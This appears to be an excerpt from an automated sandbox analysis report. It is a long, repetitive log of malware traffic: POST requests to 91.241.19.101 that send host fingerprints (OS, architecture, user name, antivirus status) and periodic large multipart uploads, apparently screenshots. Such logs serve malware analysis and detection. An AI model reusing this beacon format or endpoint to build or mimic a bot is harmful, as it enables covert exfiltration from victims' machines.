          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----02f600bd608ed13e551bb689c14fb912Host: 91.241.19.101Content-Length: 86294Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 91.241.19.101Content-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 34 32 26 73 64 3d 37 62 37 31 37 61 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 31 32 38 37 35 37 26 75 6e 3d 68 61 72 64 7a 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.42&sd=7b717a&os=1&bi=1&ar=1&pc=128757&un=user&dm=&av=13&lv=0
          Source: global trafficHTTP traffic detected: POST /g7vcSfkbDs2/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----bdc0df1738d21ae343f5b12881503e0eHost: 91.241.19.101Content-Length: 86295Cache-Control: no-cache
